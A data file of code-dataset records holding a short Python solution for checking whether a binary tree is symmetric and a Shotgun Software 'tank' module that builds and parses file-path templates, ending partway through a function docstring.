+{"seq_id":"589526049","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @File : 对称的二叉树.py\r\n# @Author: ZhouChuang\r\n# @Datetime : 2020/2/21 下午11:28\r\n# @Desc :\r\n\r\n# -*- coding:utf-8 -*-\r\n# class TreeNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.left = None\r\n# self.right = None\r\nclass Solution:\r\n def isSymmetrical(self, pRoot):\r\n # write code here\r\n if not pRoot:\r\n return True\r\n return self.compare(pRoot.left, pRoot.right)\r\n\r\n def compare(self, pRoot1, pRoot2):\r\n if not pRoot1 and not pRoot2:\r\n return True\r\n if not pRoot1 or not pRoot2:\r\n return False\r\n if pRoot1.val == pRoot2.val:\r\n if self.compare(pRoot1.left, pRoot2.right) and self.compare(pRoot1.right, pRoot2.left):\r\n return True\r\n return False\r\n","sub_path":"剑指offer/对称的二叉树.py","file_name":"对称的二叉树.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"225945132","text":"\"\"\"\nCopyright (c) 2012 Shotgun Software, Inc\n----------------------------------------------------\n\nManagement of file and directory templates.\n\n\"\"\"\n\nimport os\nimport re\n\nfrom tank_vendor import yaml\n\nfrom . import templatekey\nfrom .errors import TankError\nfrom .platform import constants\n\n\n\nclass Template(object):\n \"\"\"\n Object which manages the translation between paths and file templates\n \"\"\"\n _key_name_regex = \"[a-zA-Z_ 0-9]+\"\n \n \n @classmethod\n def _keys_from_definition(cls, definition, template_name, keys):\n \"\"\"Extracts Template Keys from a definition.\n\n :param definition: Template definition.\n :type definition: String.\n :param template_name: Name of template.\n :type template_name: String.\n :param keys: Mapping of key names to keys.\n :type keys: Dictionary.\n\n :returns: Mapping of key names to keys and collection of keys ordered as they appear in the definition.\n :rtype: List of Dictionaries, List of lists\n \"\"\"\n names_keys = {}\n ordered_keys = []\n # regular expression to find key names\n regex = r\"(?<={)%s(?=})\" % cls._key_name_regex\n key_names = re.findall(regex, definition)\n for key_name in key_names:\n key = keys.get(key_name)\n if key is None:\n msg = \"Template definition for template %s refers to key {%s}, which does not appear in supplied keys.\"\n raise TankError(msg % (template_name, key_name))\n else:\n if names_keys.get(key.name, key) != key:\n # Different keys using same name\n msg = (\"Template definition for template %s uses two keys\" +\n \" which use the name '%s'.\")\n raise TankError(msg % (template_name, key.name))\n names_keys[key.name] = key\n ordered_keys.append(key)\n return names_keys, ordered_keys\n \n def __init__(self, definition, keys, name=None):\n \"\"\"\n :param definition: Template definition.\n :type definition: String.\n :param keys: Mapping of key names to keys\n :type keys: Dictionary \n :param name: (Optional) name for this template.\n :type name: String.\n\n \"\"\"\n self.name = name\n # version for __repr__\n self._repr_def = self._fix_key_names(definition, keys)\n\n variations = self._definition_variations(definition)\n # We want them most inclusive(longest) version first\n variations.sort(cmp=lambda x, y: cmp(len(x), len(y)), reverse=True)\n\n # get format keys and types\n self._keys = []\n self._ordered_keys = []\n for variation in variations:\n var_keys, ordered_keys = self._keys_from_definition(variation, name, keys)\n self._keys.append(var_keys)\n self._ordered_keys.append(ordered_keys)\n\n # substitute aliased key names\n self._definitions = []\n for variation in variations:\n self._definitions.append(self._fix_key_names(variation, keys))\n\n # get defintion ready for string substitution\n self._cleaned_definitions = []\n for definition in self._definitions:\n self._cleaned_definitions.append(self._clean_definition(definition))\n\n # string which will be prefixed to definition\n self._prefix = ''\n self._static_tokens = []\n\n def __repr__(self):\n class_name = self.__class__.__name__\n if self.name:\n return \"\" % (class_name, self.name, self._repr_def)\n else:\n return \"\" % (class_name, self._repr_def)\n\n @property\n def definition(self):\n \"\"\"\n Property to access Template definition.\n \"\"\"\n # Use first definition as it should be most inclusive in case of variations\n return self._definitions[0]\n\n\n @property\n def keys(self):\n \"\"\"\n Returns keys for this template.\n \n :returns: a dictionary of TemplateKey objects, keyed by TemplateKey name.\n :rtype: dictionary \n \"\"\"\n # First keys should be most inclusive\n return self._keys[0].copy()\n\n def is_optional(self, key_name):\n \"\"\"\n Returns true if the given key name is optional for this template.\n \n Example: template: {Shot}[_{name}]\n is_optional(\"Shot\") --> Returns False\n is_optional(\"name\") --> Returns True\n \"\"\"\n # minimum set of required keys for this template\n required_keys = self.missing_keys({})\n if key_name in required_keys:\n # this key is required\n return False\n else:\n return True\n\n def missing_keys(self, fields, skip_defaults=False):\n \"\"\"\n Determines keys required for use of template which do not exist\n in a given fields.\n \n Example:\n \n >>> tk.templates[\"max_asset_work\"].missing_keys({})\n ['Step', 'sg_asset_type', 'Asset', 'version', 'name']\n \n \n :param fields: fields to test\n :type fields: mapping (dictionary or other)\n :param skip_defaults: If true, do not treat keys with default values as missing.\n :type skip_defalts: Bool.\n \n :returns: Fields needed by template which are not in inputs keys or which have\n values of None.\n :rtype: list\n \"\"\"\n # find shortest keys dictionary\n keys = min(self._keys)\n return self._missing_keys(fields, keys, skip_defaults)\n\n def _missing_keys(self, fields, keys, skip_defaults):\n \"\"\"\n Compares two dictionaries to determine keys in second missing in first.\n \"\"\"\n if skip_defaults:\n required_keys = [key.name for key in keys.values() if key.default is None]\n else:\n required_keys = keys\n\n return [x for x in required_keys if (x not in fields) or (fields[x] is None)]\n\n def apply_fields(self, fields):\n \"\"\"\n Creates path using fields. Certain fields may be processed in special ways, for\n example Sequence fields, which can take a \"FORMAT\" string which will intelligently\n format a image sequence specifier based on the type of data is being handled.\n For more information about special cases, see the main documentation.\n\n :param fields: Mapping of keys to fields. Keys must match those in template \n definition.\n :type fields: Dictionary\n\n :returns: Path reflecting field values inserted into template definition.\n :rtype: String\n \"\"\"\n return self._apply_fields(fields)\n\n def _apply_fields(self, fields, ignore_types=None):\n \"\"\"\n Creates path using fields.\n\n :param fields: Mapping of keys to fields. Keys must match those in template \n definition.\n :type fields: Dictionary\n :param ignore_type: Keys for whom the defined type is ignored. This \n allows setting a Key whose type is int with a string value.\n :type ignore_type: List of strings.\n\n :returns: Path reflecting field values inserted into template definition.\n :rtype: String\n \"\"\"\n ignore_types = ignore_types or []\n\n # find largest key mapping without missing values\n keys = None\n # index of matching keys will be used to find cleaned_definition\n index = -1\n for index, cur_keys in enumerate(self._keys):\n missing_keys = self._missing_keys(fields, cur_keys, skip_defaults=True)\n if not missing_keys:\n keys = cur_keys\n break\n\n \n if keys is None:\n raise TankError(\"Tried to resolve a path from the template %s and a set \"\n \"of input fields '%s' but the following required fields were missing \"\n \"from the input: %s\" % (self, fields, missing_keys))\n\n # Process all field values through template keys \n processed_fields = {}\n for key_name, key in keys.items():\n value = fields.get(key_name)\n ignore_type = key_name in ignore_types\n processed_fields[key_name] = key.str_from_value(value, ignore_type=ignore_type)\n\n return self._cleaned_definitions[index] % processed_fields\n\n def _definition_variations(self, definition):\n \"\"\"\n Determines all possible definition based on combinations of optional sectionals.\n \n \"{manne}\" ==> ['{manne}']\n \"{manne}_{ludde}\" ==> ['{manne}_{ludde}']\n \"{manne}[_{ludde}]\" ==> ['{manne}', '{manne}_{ludde}']\n \"{manne}_[{foo}_{bar}]\" ==> ['{manne}_', '{manne}_{foo}_{bar}']\n \n \"\"\"\n # split definition by optional sections\n tokens = re.split(\"(\\[[^]]*\\])\", definition)\n\n # seed with empty string\n definitions = ['']\n for token in tokens:\n temp_definitions = []\n # regex return some blank strings, skip them\n if token == '':\n continue\n if token.startswith('['):\n # check that optional contains a key\n if not re.search(\"{*%s}\" % self._key_name_regex, token): \n raise TankError(\"Optional sections must include a key definition.\")\n\n # Add definitions skipping this optional value\n temp_definitions = definitions[:]\n # strip brackets from token\n token = re.sub('[\\[\\]]', '', token)\n\n # check non-optional contains no dangleing brackets\n if re.search(\"[\\[\\]]\", token): \n raise TankError(\"Square brackets are not allowed outside of optional section definitions.\")\n\n # make defintions with token appended\n for definition in definitions:\n temp_definitions.append(definition + token)\n\n definitions = temp_definitions\n\n return definitions\n\n\n\n def _fix_key_names(self, definition, keys):\n \"\"\"\n Substitutes key name for name used in definition\n \"\"\"\n # Substitute key names for original key input names(key aliasing)\n substitutions = [(key_name, key.name) for key_name, key in keys.items() if key_name != key.name]\n for old_name, new_name in substitutions:\n old_def = r\"{%s}\" % old_name\n new_def = r\"{%s}\" % new_name\n definition = re.sub(old_def, new_def, definition)\n return definition\n\n def _clean_definition(self, definition):\n # Create definition with key names as strings with no format, enum or default values\n regex = r\"{(%s)}\" % self._key_name_regex\n cleaned_definition = re.sub(regex, \"%(\\g<1>)s\", definition)\n return cleaned_definition\n\n def _calc_static_tokens(self, definition):\n \"\"\"\n Finds the tokens from a definition which are not involved in defining keys.\n \"\"\"\n expanded_definition = os.path.join(self._prefix, definition)\n regex = r\"{%s}\" % self._key_name_regex\n tokens = re.split(regex, expanded_definition.lower())\n # Remove empty strings\n return [x for x in tokens if x]\n\n @property\n def parent(self):\n \"\"\"\n Returns Template representing the current Template's parent.\n \"\"\"\n raise NotImplementedError\n\n\n def validate(self, path, fields=None, skip_keys=None):\n \"\"\"\n Validates that a path fits with a template.\n\n :param path: Path to validate\n :type path: String\n :param fields: Optional: Mapping of key/values with which to add to the fields\n extracted from the path before validation happens. \n :type fields: Dictionary\n :param skip_keys: Optional: Field names whose values should be ignored\n :type skip_keys: List\n\n :rtype: Bool\n \"\"\"\n fields = fields or {}\n skip_keys = skip_keys or []\n # Path should split into keys as per template\n try:\n path_fields = self.get_fields(path, skip_keys=skip_keys)\n except TankError:\n return False\n # Check input values match those in path\n for key, value in fields.items():\n if (key not in skip_keys) and (path_fields.get(key) != value):\n return False\n return True\n\n def get_fields(self, input_path, skip_keys=None):\n \"\"\"\n Extracts key name, value pairs from a string.\n \n :param input_path: Source path for values\n :type input_path: String\n :param skip_keys: Optional keys to skip\n :type skip_keys: List\n\n :returns: Values found in the path based on keys in template\n :rtype: Dictionary\n \"\"\"\n path_parser = None\n fields = None\n\n for ordered_keys, static_tokens in zip(self._ordered_keys, self._static_tokens):\n path_parser = TemplatePathParser(ordered_keys, static_tokens)\n fields = path_parser.parse_path(input_path, skip_keys)\n if fields:\n break\n\n if fields is None:\n raise TankError(\"Template %s: %s\" % (str(self), path_parser.last_error))\n\n return fields\n\n\nclass TemplatePath(Template):\n \"\"\"\n Class for templates for paths.\n \"\"\"\n def __init__(self, definition, keys, root_path, name=None):\n \"\"\"\n :param definition: Template definition.\n :type definition: String.\n :param keys: Mapping of key names to keys\n :type keys: Dictionary \n :param root_path: Path to project root for this template.\n :type root_path: String.\n :param name: (Optional) name for this template.\n :type name: String.\n\n \"\"\"\n super(TemplatePath, self).__init__(definition, keys, name=name)\n self._prefix = root_path\n\n # Make definition use platform seperator\n for index, rel_definition in enumerate(self._definitions):\n self._definitions[index] = os.path.join(*split_path(rel_definition))\n\n # get defintion ready for string substitution\n self._cleaned_definitions = []\n for definition in self._definitions:\n self._cleaned_definitions.append(self._clean_definition(definition))\n\n # split by format strings the definition string into tokens \n self._static_tokens = []\n for definition in self._definitions:\n self._static_tokens.append(self._calc_static_tokens(definition))\n\n @property\n def root_path(self):\n return self._prefix\n\n @property\n def parent(self):\n \"\"\"\n Creates Template instance for parent directory of current Template. \n \n :returns: Parent's template\n :rtype: Template instance\n \"\"\"\n parent_definition = os.path.dirname(self.definition)\n if parent_definition:\n return TemplatePath(parent_definition, self.keys, self.root_path, None)\n return None\n\n def _apply_fields(self, fields, ignore_types=None):\n relative_path = super(TemplatePath, self)._apply_fields(fields, ignore_types)\n return os.path.join(self.root_path, relative_path)\n\n\nclass TemplateString(Template):\n \"\"\"\n Template class for templates not representing paths.\n \"\"\"\n def __init__(self, definition, keys, name=None, validate_with=None):\n super(TemplateString, self).__init__(definition, keys, name=name)\n self.validate_with = validate_with\n self._prefix = \"@\"\n\n # split by format strings the definition string into tokens \n self._static_tokens = []\n for definition in self._definitions:\n self._static_tokens.append(self._calc_static_tokens(definition))\n \n @property\n def parent(self):\n \"\"\"\n Strings have no parents\n \"\"\"\n return None\n\n\n def get_fields(self, input_path, skip_keys=None):\n \"\"\"\n Given a path, return mapping of key values based on template.\n \n :param input_path: Source path for values\n :type input_path: String\n :param skip_keys: Optional keys to skip\n :type skip_keys: List\n\n :returns: Values found in the path based on keys in template\n :rtype: Dictionary\n \"\"\"\n # add path prefix as origonal design was to require project root\n adj_path = os.path.join(self._prefix, input_path)\n return super(TemplateString, self).get_fields(adj_path, skip_keys=skip_keys)\n\n\n\n\ndef split_path(input_path):\n \"\"\"\n Split a path into tokens.\n\n :param input_path: path to split\n :type input_path: string\n\n :returns: tokenized path\n :rtype: list of tokens\n \"\"\"\n cur_path = os.path.normpath(input_path)\n cur_path = cur_path.replace(\"\\\\\", \"/\")\n return cur_path.split(\"/\")\n\n\nclass TemplatePathParser(object):\n \"\"\"\n Class for parsing a path for a known set of keys, and known set of static\n tokens which should appear between the key values.\n \"\"\"\n def __init__(self, ordered_keys, static_tokens):\n \"\"\"\n :param ordered_keys: Template key objects in order that they appear in\n template definition.\n :param static_tokens: Pieces of definition not representing Template Keys.\n \"\"\"\n self.ordered_keys = ordered_keys\n self.static_tokens = static_tokens\n self.fields = {}\n self.input_path = None\n self.last_error = \"Unable to parse path\" \n\n def parse_path(self, input_path, skip_keys):\n \"\"\"\n Moves through a path in a linear fashion determing values for keys.\n\n :param input_path: Path to parse.\n :type input_path: String.\n :param skip_keys: Keys for whom we do not need to find values.\n :type skip_keys: List of strings.\n\n :returns: Mapping of key names to values or None. \n \"\"\"\n skip_keys = skip_keys or []\n input_path = os.path.normpath(input_path)\n\n # if no keys, nothing to discover\n if not self.ordered_keys:\n if input_path.lower() == self.static_tokens[0].lower():\n # this is a template where there are no keys\n # but where the static part of the template is matching\n # the input path\n # (e.g. template: foo/bar - input path foo/bar)\n return {}\n else:\n # template with no keys - in this case not matching \n # the input path. Return for no match.\n return None\n \n\n self.fields = {}\n last_index = None # end index of last static token\n start_index = None # index of begining of next static token\n end_index = None # end index of next static token\n key_index = 0 # index of key in ordered keys list\n token_index = 0 # index of token in static tokens list\n # crawl through input path\n while last_index < len(input_path):\n # Check if there are keys left to process\n if key_index < len(self.ordered_keys):\n # get next key\n cur_key = self.ordered_keys[key_index]\n key_name = cur_key.name\n else:\n # all keys have been processed\n key_name = None\n\n # Check that there are static token left to process\n if token_index < len(self.static_tokens):\n cur_token = self.static_tokens[token_index]\n \n start_index = self.find_index_of_token(cur_key, cur_token, input_path, last_index)\n if start_index is None:\n return None\n \n if cur_key.length is not None:\n # there is a minimum length imposed on this key\n if last_index and (start_index-last_index) < cur_key.length:\n # we may have stopped early. One more click ahead\n start_index = self.find_index_of_token(cur_key, cur_token, input_path, start_index+1)\n if start_index is None:\n return None\n \n\n end_index = start_index + len(cur_token)\n else:\n # All static tokens used, go to end of string\n end_index = len(input_path)\n start_index = end_index\n\n # last index is None on first iteration only\n if last_index is not None:\n # Check we haven't previously processed all keys\n if key_index >= len(self.ordered_keys):\n msg = (\"Tried to extract fields from path '%s',\" +\n \"but path does not fit the template.\")\n self.last_error = msg % input_path\n return None\n \n if key_name not in skip_keys:\n value_str = input_path[last_index:start_index]\n processed_value = self._process_value(value_str, cur_key, self.fields)\n if processed_value is None:\n return None\n else:\n self.fields[key_name] = processed_value\n\n key_index += 1\n token_index += 1\n last_index = end_index\n return self.fields\n\n\n def find_index_of_token(self, key, token, input_path, last_index):\n \"\"\"\n Determines starting index of a sub-string in the remaining portion of a path.\n\n If possible, domain knowledge will be used to improve the accuracy.\n :param key: The the key whose value should start after the token.\n :param token: The sub-string whose index we search.\n :param input_path: The path in which to search.\n :param last_index: The index in the path beyond which we shall search.\n\n :returns: The index of the start of the token.\n \"\"\"\n # in python 2.5 index into a string cannot be None\n last_index = last_index or 0\n\n input_path_lower = input_path.lower()\n # Handle keys which already have values (they exist more than once in definition)\n if key.name and key.name in self.fields:\n # value is treated as string as it is compared to input path\n # have to format correctly though otherwise search may fail!\n value = key.str_from_value(self.fields[key.name])\n \n # check that value exists in the remaining input path\n if value in input_path[last_index:]:\n value_index = input_path.index(value, last_index) + len(value)\n # check that token is in path after known value\n if not token in input_path_lower[value_index:]:\n msg = (\"Tried to extract fields from path '%s',\" + \n \"but path does not fit the template.\")\n self.last_error = msg % input_path\n return None\n\n start_index = input_path_lower.index(token, value_index)\n if start_index != value_index:\n msg = \"Template %s: Unable to find value for key %s in path %s\"\n self.last_error = msg % (self, key.name, input_path)\n return None\n else:\n msg = \"Template %s: Unable to find value for key %s in path %s\"\n self.last_error = msg % (self, key.name, input_path)\n return None\n else:\n # key has not been previously processed\n # Check that the static token exists in the remaining input string\n if not token in input_path_lower[last_index:]:\n msg = \"Tried to extract fields from path '%s', but path does not fit the template.\"\n self.last_error = msg % input_path\n return None\n\n start_index = input_path_lower.index(token, last_index) \n return start_index\n\n\n def _process_value(self, value_str, cur_key, fields):\n \"\"\"\n Checks value is valid both for it's key and in relation to existing values for that key.\n \"\"\"\n value = cur_key.value_from_str(value_str)\n key_name = cur_key.name\n \n if fields.get(key_name, value) != value:\n msg = \"%s: Conflicting values found for key %s: %s and %s\"\n self.last_error = msg % (self, key_name, fields[key_name], value)\n return None\n\n if os.path.sep in value_str:\n msg = \"%s: Invalid value found for key %s: %s\"\n self.last_error = msg % (self, key_name, value)\n return None\n \n return value\n\ndef read_templates(pipeline_configuration):\n \"\"\"\n Creates templates and keys based on contents of templates file.\n\n :param pipeline_configuration: pipeline config object\n\n :returns: Dictionary of form {template name: template object}\n \"\"\"\n \n data = pipeline_configuration.get_templates_config() \n \n # get dictionaries from the templates config file:\n def get_data_section(section_name):\n # support both the case where the section \n # name exists and is set to None and the case where it doesn't exist\n d = data.get(section_name)\n if d is None:\n d = {}\n return d \n \n keys = templatekey.make_keys(get_data_section(\"keys\"))\n template_paths = make_template_paths(get_data_section(\"paths\"), keys, pipeline_configuration.get_data_roots() )\n template_strings = make_template_strings(get_data_section(\"strings\"), keys, template_paths)\n\n # Detect duplicate names across paths and strings\n dup_names = set(template_paths).intersection(set(template_strings))\n if dup_names:\n raise TankError(\"Detected paths and strings with the same name: %s\" % str(list(dup_names)))\n\n # Put path and strings together\n templates = template_paths\n templates.update(template_strings)\n return templates\n\n\ndef make_template_paths(data, keys, roots):\n \"\"\"\n Factory function which creates TemplatePaths.\n\n :param data: Data from which to construct the template paths.\n :type data: Dictionary of form: {